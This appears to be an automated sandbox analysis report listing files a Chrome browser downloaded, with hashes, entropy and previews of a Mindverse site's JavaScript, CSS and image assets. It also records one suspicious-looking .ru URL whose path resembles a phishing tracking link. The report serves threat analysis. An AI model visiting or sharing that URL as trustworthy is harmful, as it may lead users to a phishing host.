                                      File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                      Category:downloaded
                                      Size (bytes):132765
                                      Entropy (8bit):5.616272795201476
                                      Encrypted:false
                                      SSDEEP:1536:HI0u9700bfP7BDAPiLPv2Lhe83YalVqF3TYz6GIyO2Jwo44KOsElNR4d0PtqV:sfP7Bs6WLcwYaZtl7wAKO7ed0PEV
                                      MD5:03FF2B41F8808118238CBECCDCB0096D
                                      SHA1:9BED57E42FA043ED23F578C6FC98555AED342936
                                      SHA-256:26FE4306933E5F6CCEE1B8AF65DC834282AEFE4D85FC38858A645C348E3718F7
                                      SHA-512:99FD784B26F7C569B981983B00ECC5945608BE2E1B7FBCA0DAE4A8EF8596247037789671F3DCDA645773D0E20ABCAD731F65FC5620A62719D9216095D8484DDC
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/app/(layout)/(PALayout)/layout-298e56217fdcc4c6.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1947],{27748:function(e,t,n){Promise.resolve().then(n.bind(n,13165))},13165:function(e,t,n){"use strict";let a,i;n.r(t),n.d(t,{default:function(){return iq}});var s,l,r,o,c,d,u,m,x,p,h,v,f,g,_,b,j,N,w,y,C,E,k,S,I,L,P,M,Z,T,A,O,R,F,D,B,U,H,K,z,Y,V,W,G,q=n(57437),$=n(16463),X=n(2265),J=n(17834),Q=n(81648),ee=n(32078),et=n.n(ee),en=e=>{let{showDefaultLogo:t=!0}=e;return(0,q.jsxs)("div",{className:"flex items-center justify-center h-full w-full",children:[t&&(0,q.jsxs)("div",{className:et().defaultLogoContainer,children:[(0,q.jsx)("img",{className:et().logo,src:Q.p}),(0,q.jsx)("div",{className:"text-primary-black text-sm leading-6 font-[Calistoga-Regular]",children:"Me.bot"})]}),(0,q.jsxs)("div",{className:et().largeLogoContainer,children:[(0,q.jsx)("img",{className:et().logo,src:Q.p,style:{width:"84px",height:"48px"}}),(0,q.jsx)("div",{className:"text-primary-black text-sm leading-6 font-[Calistoga-Regular] w-[84px] text-center",chi
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:downloaded
                                      Size (bytes):16348702
                                      Entropy (8bit):7.96642045892782
                                      Encrypted:false
                                      SSDEEP:393216:V8e097ZlzjQ/NhYxaTEy1t2HKvPod5fIGlunrqGbRzRCfYYYL:Vn0j5jQN1TEy1+sPUmrq2zRCfYYYL
                                      MD5:2E26DFC315ABB870CBC902C88D5305B2
                                      SHA1:B8DCE1B347263C616A7DC66AB91341F555E0F468
                                      SHA-256:29B52FEB08AA933798F490A92AE6AD661CF22D2E3D2D8E29236C633D73BF9FBC
                                      SHA-512:3E9CF7596BF40C1BADC4D8163177D8C5FD51B6736C305189B7084610D9DF42CAE1815878C367D33DE87CD3AA475D034B36D6A2887CC6C702204EC3C073ACB0BB
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-img/crm/1736841004164/gif-2.gif?number=0
                                      Preview:GIF89a.........s..ROQ.pS....j.....#..zXHoG6OBD.Y<.n......E<:...:89..h?T...y...X:+....slfe......Z.{5'%...L-...o....w...5 ...qD2,.....3.k.b....c....j.{Z.c" !|z|.........))*..........k....c.......!)!'.........tss..............D($.........:1)[Z[........{Z.kW....................................~kt1-2}k.`MC.xd.....C..gOW..fvM^.Wa...wS......}...._.k.........!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:B5AD7887CA6F11EF96F2C797EE89DF01" xmpMM:DocumentID="xmp.did:B5AD7888CA6F11EF96F2C797EE89DF01"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (14587), with no line terminators
                                      Category:downloaded
                                      Size (bytes):14587
                                      Entropy (8bit):5.445169731829979
                                      Encrypted:false
                                      SSDEEP:192:hHp5+YMLpGG892dglc2hFK2Bj0wOojBTyF3aH4YBo7z20EckRFrYQu4B7yKMkK:hHp5+YMLpG/L1PcFqBo20EVy4pqkK
                                      MD5:0E1B507841ADEAA5F7ABE674BF67CD8B
                                      SHA1:C9693A2AA390F0D99BED1F650BA101A797009A95
                                      SHA-256:44F19C15B9FEEAE2A2DD110E6C77A8075CBC17C6514A79DCB1D153B927F9182C
                                      SHA-512:2B04CDE5C779CA7A3288E23B5786E1D8EB1360A602AAEA46E81EDDF292CEB5644B014BDF93166AECE7F5E326738E6FB13A6D5ACD436E05ACBB6FE915A1E5E173
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/4595-19c1c19690f67e9a.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4595],{66648:function(e,t,n){n.d(t,{default:function(){return i.a}});var r=n(55601),i=n.n(r)},16463:function(e,t,n){var r=n(71169);n.o(r,"usePathname")&&n.d(t,{usePathname:function(){return r.usePathname}}),n.o(r,"useRouter")&&n.d(t,{useRouter:function(){return r.useRouter}}),n.o(r,"useSearchParams")&&n.d(t,{useSearchParams:function(){return r.useSearchParams}}),n.o(r,"useSelectedLayoutSegment")&&n.d(t,{useSelectedLayoutSegment:function(){return r.useSelectedLayoutSegment}}),n.o(r,"useSelectedLayoutSegments")&&n.d(t,{useSelectedLayoutSegments:function(){return r.useSelectedLayoutSegments}}),n.o(r,"useServerInsertedHTML")&&n.d(t,{useServerInsertedHTML:function(){return r.useServerInsertedHTML}})},38173:function(e,t,n){Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"Image",{enumerable:!0,get:function(){return v}});let r=n(99920),i=n(41452),o=n(57437),a=i._(n(2265)),u=r._(n(54887)),l=r._(n(2832
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (38325), with no line terminators
                                      Category:downloaded
                                      Size (bytes):38325
                                      Entropy (8bit):5.490021901618187
                                      Encrypted:false
                                      SSDEEP:768:ugtySmDFoNLu4TWvbVckSJbtlWh+cT+st0bb+ax:lrLu7vbVcXJbS5PtCJ
                                      MD5:F5CB09DB7321883443F5C5CCE94EC501
                                      SHA1:2814B9A896A99FF955A1DD55BA8929C38735B72C
                                      SHA-256:EB40C34C32BCD59D0C20A247F16262DB70CC8419072635E23DF50CAB0947705F
                                      SHA-512:47A31968D9FEAF3FB1A79C970A66D67CDA052B2526A1EF44EF910E64E4AE38514D0DC1422AD1B51DC9290AF9C10485E7BB6EDFFF316C1954A508DF396A175E47
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/3122-1f6938ed37fcf02d.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3122],{96447:function(e,t,n){n.d(t,{CW:function(){return y}});var r=n(46327),o=n(89443),c=n(49205),a=n(24),i=n(61942),l=n(9772),s=n.n(l),u=n(2433),f=n(2265),d=n(38750),p=n(87230),v=function(e,t){var n={};for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&0>t.indexOf(r)&&(n[r]=e[r]);if(null!=e&&"function"==typeof Object.getOwnPropertySymbols)for(var o=0,r=Object.getOwnPropertySymbols(e);o<r.length;o++)0>t.indexOf(r[o])&&Object.prototype.propertyIsEnumerable.call(e,r[o])&&(n[r[o]]=e[r[o]]);return n};let m={info:f.createElement(a.Z,null),success:f.createElement(r.Z,null),error:f.createElement(o.Z,null),warning:f.createElement(c.Z,null),loading:f.createElement(i.Z,null)},y=e=>{let{prefixCls:t,type:n,icon:r,children:o}=e;return f.createElement("div",{className:s()("".concat(t,"-custom-content"),"".concat(t,"-").concat(n))},r||m[n],f.createElement("span",null,o))};t.ZP=e=>{let{prefixCls:t,className:n,type:r,icon:o,c
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:SVG Scalable Vector Graphics image
                                      Category:dropped
                                      Size (bytes):20902
                                      Entropy (8bit):6.023435901450703
                                      Encrypted:false
                                      SSDEEP:384:jvmhXc0LiV2wcPed1cb9LQpe7jLlIqL0nBsFu0nm5PxrGHA+yIVUhrYK086od:jvmhwVpF2b9LQpMLuPo85PxXs6ho83d
                                      MD5:3BBF9CF5998E93B76C9B48C644536133
                                      SHA1:C2EF640F96CCB6DA215DBB7769C231F2BC1BFC31
                                      SHA-256:233947C85AC7AF3CE0CD5DA5A29B65241A8DA4F5FCB48CE98B2A1A22162F9090
                                      SHA-512:EBC069171B71EF61CCC56E72AEBFEC6423C082B3644776D9A97FF84759C3536EDB91991BECDEBD46149E3A2909025DBF53FBD3F23F4B23F1D7A1783C77B61EB4
                                      Malicious:false
                                      Reputation:low
                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" fill="none" version="1.1" width="123.60000610351562" height="48" viewBox="0 0 123.60000610351562 48"><defs><pattern x="0" y="0" width="123.60000610351562" height="48" patternUnits="userSpaceOnUse" id="master_svg0_34090_089497"><image x="0" y="-0.0000011851486654279597" width="123.60000610351562" height="48.00000237029733" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAgMAAADICAYAAAB1a+IJAAAAAXNSR0IArs4c6QAAAARzQklUCAgICHwIZIgAACAASURBVHic7b19kCP3ed/5eX7dDcz77nJJLkmJEi1qSVoUY1uUZZKyw9myzjJJ20zJWcq6K0eiU5ESW050lq1LnR1zVlWXuvJZd4rtpFK+2JSc1CnkxrrIZ5Inl3I7vFwoVSz6TVyK5NISLVIkl/u+szMDoPv3e+6P7sZgsJgXzAADzMzzUUHANIBGz3LQv29/nzfBWJMnHtbpANPlzyLc3eFl0x22zbZvUOVJAFc8d8+DctlrDMMwdjP6xB3Tl210Lt8Wwmz7U3LP1y7bZnSHDPoAhonHHtaZ8nGx4E9v0UfPQi4UTCQYhrHT0SfumG4u7gCid6M9Ot9Ky0WYypOleDDBsDq7WgyUi78IDw34UDoxCyDKETBxYBjG9qS58Pdywd8opVDwegRMILSyq8RAy+K/lVf9vWIWcnFgwsAwjGFl+VW/DuOF1hImDprseDEw5Ff/m2HWhIFhGMOAfvmumeL
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (5162), with no line terminators
                                      Category:downloaded
                                      Size (bytes):5162
                                      Entropy (8bit):5.349865760247148
                                      Encrypted:false
                                      SSDEEP:96:mtOTUb1db1ClNY5co7shdiUYVqig7O7aZCUgpgXEt94k+g8IHh8u928DoCLQ:mtOT8TfL1Vqig7mIg8IB8u88DA
                                      MD5:70A8F21806E7F1B739937970EBE49A0C
                                      SHA1:6BE9EEBCE438DE91FEB20E6A5458774B327AA9B4
                                      SHA-256:C8B531CFD6E9BE13762E289820F67406331303CD5111A885DE959BF83DD0F5AC
                                      SHA-512:3C055567D0ED53BD30773C0BE475DC7499E44AFB92FB05021029D9A0C1299A470CDD3A8CACCCF798D5345ED627C5836E9DF5955A120FE56BA3624EC76A673270
                                      Malicious:false
                                      Reputation:low
                                      URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.NMINDki6kLA.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTvYlftuY78adXLhp87lmRFFGNIY2Q"
                                      Preview:.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_H .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_H .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_H .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (48280), with no line terminators
                                      Category:downloaded
                                      Size (bytes):48280
                                      Entropy (8bit):5.448499248642943
                                      Encrypted:false
                                      SSDEEP:768:oCcJZfEJyoCPV+j/I5EBIf0WTE7OVUsvbvR5wnNPJFLEWRbxVB6wy3GY3TnSMq1v:GrEJyoCPV+j/I5sIA7OpvbvRQRFLEWRP
                                      MD5:0A7743D49C06F6E15E7296C51D70829C
                                      SHA1:A82617FC74F2BB95A7EADCE95516514F39FEF9C5
                                      SHA-256:9FAAA0170D2B45F994513617D537C24C291D454E397F13B9C127176B3F2A778C
                                      SHA-512:3C9A51044C74606F5D709B0E8DEADB8D8398940555F738B9C2D31205F91566C58C6973F9A12401D515E97C714705DD6627C769D37C4CC575E92010512F0B863D
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/6701-3887d30af462f285.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6701],{97009:function(t,e,o){o.d(e,{Z:function(){return x}});var n=o(83590);function r(t,e){(null==e||e>t.length)&&(e=t.length);for(var o=0,n=Array(e);o<e;o++)n[o]=t[o];return n}function a(t,e){return function(t){if(Array.isArray(t))return t}(t)||function(t,e){var o=null==t?null:"undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(null!=o){var n,r,a,i,l=[],c=!0,s=!1;try{if(a=(o=o.call(t)).next,0===e){if(Object(o)!==o)return;c=!1}else for(;!(c=(n=a.call(o)).done)&&(l.push(n.value),l.length!==e);c=!0);}catch(t){s=!0,r=t}finally{try{if(!c&&null!=o.return&&(i=o.return(),Object(i)!==i))return}finally{if(s)throw r}}return l}}(t,e)||function(t,e){if(t){if("string"==typeof t)return r(t,e);var o=({}).toString.call(t).slice(8,-1);return"Object"===o&&t.constructor&&(o=t.constructor.name),"Map"===o||"Set"===o?Array.from(t):"Arguments"===o||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(o)?r(t,e):void 0}}(t,e)||fun
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:very short file (no magic)
                                      Category:downloaded
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Reputation:low
                                      URL:https://i9rb1.viugbu.ru/ando@egsyw
                                      Preview:1
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (21900), with no line terminators
                                      Category:downloaded
                                      Size (bytes):21900
                                      Entropy (8bit):5.283387313866423
                                      Encrypted:false
                                      SSDEEP:192:15glidwpx0PO5z2P16Rk6wukmEIOJ8nDinIwXxa8P:rJdwpAt6kIOJ6Kcm
                                      MD5:C688543E0EB88E17F5B841E0577F3961
                                      SHA1:CEEA35C3073B5CD9E3746B17ECD14062CD35FF25
                                      SHA-256:4CD7E148197153887E2AF0E1DDC7B3AEAC278EABDD34C0819E2BF64A4AEF03F0
                                      SHA-512:B07F41A62FB6A86149E5420C7552C33761F30C30238A3FB2E5A1EABC6E5582C5A13573856F6B9B1CFAB511AD9EB5BA4C3E3C7E14E6998E4DB725602295980606
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/f5306442bb4b8941.css
                                      Preview:.index_container__HQkwB{display:flex;gap:8px;justify-content:center;max-width:256px;background-color:#7b67ef}.index_icon__7DO55{width:20px;height:20px;margin-top:2px}.index_content__mpo5c{color:#fefdff;font-weight:400;font-size:14px;font-family:Helvetica Neue,sans-serif;line-height:24px;letter-spacing:0}.index_popover__fJ4cn .ant-popover-inner{border-radius:16px}.index_container__HwzYj{position:relative;display:flex;flex-shrink:0;align-items:center;box-sizing:border-box;width:100%;margin-bottom:20px;padding:12px 16px;overflow:hidden;background:rgba(254,253,255,.6);border:1px solid var(--primary-light-gray);border-radius:12px;cursor:pointer;transition:background .2s}.index_container__HwzYj .index_title__2f5Or{color:var(--primary-black);font-weight:400;font-size:14px;line-height:24px;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}.index_container__HwzYj.index_current__kVi_f .index_title__2f5Or{color:var(--primary-color)}.index_container__HwzYj:hover{background:rgba(254,253,255
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (42232), with no line terminators
                                      Category:downloaded
                                      Size (bytes):42232
                                      Entropy (8bit):5.351058006549533
                                      Encrypted:false
                                      SSDEEP:768:45WtuZBAXWY0u+F8llsivowBUUdYNlsz6ca5QvlKuMc:egwiablsz6ca5eKun
                                      MD5:2A54BD7D251C77A482C0278550E1EA65
                                      SHA1:CDF421FE1790D3587EEEEA7CCBC5590FA4A716FD
                                      SHA-256:8A234F72A82F2834FA9452BE6F52D51B8E216AAF3D09B0FBE2A3A23F0B48C7AA
                                      SHA-512:7CBB4BFA4A8F863EDD8F83746DD58113FAE2C3CBF9F93176E83506D26312A246286C355771E82B74ED3E85039113B7D5EF4DDF210A96E6E8616C40718034F656
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/9818-2cef5ca4ed1a1e3a.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9818],{675:function(e,n,t){t.d(n,{Z:function(){return b}});var o,r=t(39428),a=t(2265),c=t(54887),i=t(29282);t(67638);var l=t(17492),s=a.createContext(null),u=t(57111),d=t(89534),f=[],m=t(76741);function p(e){var n=e.match(/^(.*)px$/),t=Number(null==n?void 0:n[1]);return Number.isNaN(t)?function(e){if("undefined"==typeof document)return 0;if(void 0===o){var n=document.createElement("div");n.style.width="100%",n.style.height="200px";var t=document.createElement("div"),r=t.style;r.position="absolute",r.top="0",r.left="0",r.pointerEvents="none",r.visibility="hidden",r.width="200px",r.height="150px",r.overflow="hidden",t.appendChild(n),document.body.appendChild(t);var a=n.offsetWidth;t.style.overflow="scroll";var c=n.offsetWidth;a===c&&(c=t.clientWidth),document.body.removeChild(t),o=a-c}return o}():t}var g="rc-util-locker-".concat(Date.now()),v=0,y=function(e){return!1!==e&&((0,i.Z)()&&e?"string"==typeof e?document.query
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:downloaded
                                      Size (bytes):6226156
                                      Entropy (8bit):7.963604331475551
                                      Encrypted:false
                                      SSDEEP:98304:v95SerILRQm0eogO9PS46I8l9L+DO+kLuKjvPQ/9HwkQUxdTqm8O8yo1a+jnVn:V5SerI910D7Q4R8x+kzjQ/NzdTqLO7y7
                                      MD5:28FB111CB505AA4FD3C410EC4F157F6F
                                      SHA1:5726A74C220BD5FAF001613E076AD7FD182DA13D
                                      SHA-256:893CA33CC38CAC8321A75910F10FD8564B395E199EBFEE7AA644A1C2542DACFD
                                      SHA-512:C9E35257E0CF581F20760D1A31163D02DE34681E6379DCF85F2E96516585A111CC7E99FE5088EC934F6FCA1DC944E1E5812CEC7EC76BFA56A2BE1968255CD12A
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-img/crm/1736841004164/gif-2.gif?number=2
                                      Preview:GIF89a.........s..ROQ.pS....j.....#..zXHoG6OBD.Y<.n......E<:...:89..h?T...y...X:+....slfe......Z.{5'%...L-...o....w...5 ...qD2,.....3.k.b....c....j.{Z.c" !|z|.........))*..........k....c.......!)!'.........tss..............D($.........:1)[Z[........{Z.kW....................................~kt1-2}k.`MC.xd.....C..gOW..fvM^.Wa...wS......}...._.k.........!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:B5AD7887CA6F11EF96F2C797EE89DF01" xmpMM:DocumentID="xmp.did:B5AD7888CA6F11EF96F2C797EE89DF01"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (652), with no line terminators
                                      Category:downloaded
                                      Size (bytes):652
                                      Entropy (8bit):4.955527307237414
                                      Encrypted:false
                                      SSDEEP:12:85RphWMTRp7sVmWKiBqWMTRp7Da4Qk3yRpaN+dTVk28hRpaN+CJCO:Cphxp7sVmW1qxp71Qk3YpAsTVODpAZ/
                                      MD5:5D4643A0A96DB62919BB0E33EF4B4B71
                                      SHA1:3B83888BAAD67DB98C640A1C19C657A688E62C9A
                                      SHA-256:31417E1399C46278C0061F613DBD13B280485331477AD6F74407C279C2532787
                                      SHA-512:DA544241F7E817494AC9C3F119CFAEDDF2121CB2D46617E6B1541AE63CD4E600868CDBB2AE5422754A1F6CFA77ABDAB5E0AB8F1D14478972730C19037475B8A7
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/1a6cf6cb21e73d70.css
                                      Preview:.index_modalContainer__vZyCj{padding-bottom:24px}.index_modalContainer__vZyCj .index_content__cMFr6{font-size:14px;line-height:22px}.index_modalContainer__vZyCj .index_desc__59kro{display:flex;align-items:center;width:-moz-fit-content;width:fit-content;color:var(--primary-color);cursor:pointer;font-size:14px;line-height:22px}.index_modalContainer__vZyCj .index_desc__59kro .index_icon__VmtWY{margin-left:8px;font-size:14px}.index_modalContainer__vZyCj .index_buttonContainer__nWjsM{display:flex;align-items:center;justify-content:right;margin-top:48px}.index_modalContainer__vZyCj .index_buttonContainer__nWjsM .index_naviBtn__Ywfd0{margin-left:12px}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (570), with no line terminators
                                      Category:downloaded
                                      Size (bytes):570
                                      Entropy (8bit):4.986192311069292
                                      Encrypted:false
                                      SSDEEP:12:hH+vC8Vk2GeFpIAt1CZHw1HHw+426sdC8Vk2Ge7kJmR8G3mRoW:hH+tV1pI+1CZHwBH02HVrk+8pf
                                      MD5:0B5EAADA31AAA6F4DFB34058AEF040D6
                                      SHA1:4A52289A545B108A3FF3A708105897CD7BAF2349
                                      SHA-256:ED09AABC627AE05D498070D4C71106D42D881C7E995069FF2C7392A285F36A16
                                      SHA-512:2DDE856490926538901A5DF8FB208DB51D5EA6499E9AE067E3968802CFD52F51A78077BBCBA0AC7B021243F5CFE80259BFF0F0B2A206D5B6095C007E7B27ABA5
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/519924f3a30073d0.css
                                      Preview:.index_defaultLogoContainer__rP1Rz{position:absolute;top:0;left:0;display:flex;flex-direction:column;align-items:center;justify-content:center;width:92px;margin:20px 0;cursor:pointer;transition:transform .3s}.index_defaultLogoContainer__rP1Rz .index_logo__JjH_o{width:42px;height:24px}.index_defaultLogoContainer__rP1Rz:hover{transform:scale(1.1)}.index_largeLogoContainer__I0s8I{display:flex;flex-direction:column;align-items:center;justify-content:center;margin:20px 0;animation:index_heartbeat__sFctG 1.5s}@keyframes index_heartbeat__sFctG{0%{opacity:0}to{opacity:1}}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (3300)
                                      Category:downloaded
                                      Size (bytes):3305
                                      Entropy (8bit):5.855242330020968
                                      Encrypted:false
                                      SSDEEP:96:l3lsC3eB07MtHAbXpUCkf7zNDs6ffQffo:l1s2wqbeCWDj
                                      MD5:559D8A3D8873BDBAC45F1798C589B550
                                      SHA1:0A0068CC131E432A01E8ECDAB222EEA8C5345D04
                                      SHA-256:9744C57B7CA9DFB6192C122B2491F2E41DB8226D59D00B4D4F7879E6D88C5522
                                      SHA-512:269E850FCA9DEAFDCFFE0A4EBD5C8301973D3DAE9F81030309D60E03131E9A73933D3D5750688AA60E9F3BBCB884C63778860ADCBCE2E53E98E3DDBBC06F7AFB
                                      Malicious:false
                                      Reputation:low
                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                      Preview:)]}'.["",["nyt crossword clues","lottery mega millions powerball jackpot","pokemon cards","saints football","partial solar eclipse march 29","atlantic hurricane season","td banks closing","erik temptation island"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CggvbS8wNWczdhINRm9vdGJhbGwgdGVhbTKqDWRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRFVBQUFCQUNBTUFBQUNOMTg4d0FBQUFvbEJNVkVYLy8vOEFBQURUdkkzY3hKUFp3Wkg4L1B6azVPVHg4ZkYwZEhUUHo4L1YxZFd6czdPTGk0djM5L2RiVzF2R3hzWitmbjdlM3Q2aG9hR1JrWkV0TFMyWmlHWkFRRUMrdnI1bFpXVTZPanF0cmExSFIwZXBsM0hNdG9nZkh4L3E2dW9XRmhibHpKbTNvM3JCcklHT2YxOGNGQUJET2lZMkxoeDFhRTA5TlNWL2NWVmhWajhPQmdCUlJ6SnBYVU1NRUJZaUpTa21IeEZRVVZFb0l4c0FDUmdaSENMNTJLdTBBQUFFQ0VsRVFWUklpWjFYNjNxaU9oUmxtWVE3QklMSVJSU3JWcW5XMXNPY2VmOVhPenVBMnM3NWRLVHhGOWxaeWI2c3JCME40KzZvNzVzZWpQQW5JSUg0
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:downloaded
                                      Size (bytes):123883
                                      Entropy (8bit):5.313335419696118
                                      Encrypted:false
                                      SSDEEP:1536:LRw2SG1hwso8gDmsdlt1d1mmNb6q5EJ3v7:Ybr84bN5Iz
                                      MD5:D50FB8040840A45DC6F44B3DCCC3A4C8
                                      SHA1:F0975D26C09F8A2121234488CC026E3709D7D0A2
                                      SHA-256:642B830474F2D1B2763F7AEC388BC91F53D6ED823B9CE99EF955299449764029
                                      SHA-512:6498EF4A5036841053385AEB70CA44193F3D41DFA8411389F64E59EF8F83D273FADA5EF157D8D530B7EC650F45F0A1136F189122EB410A936743FDB0A567B23B
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/7023-0a587941e37db9aa.js
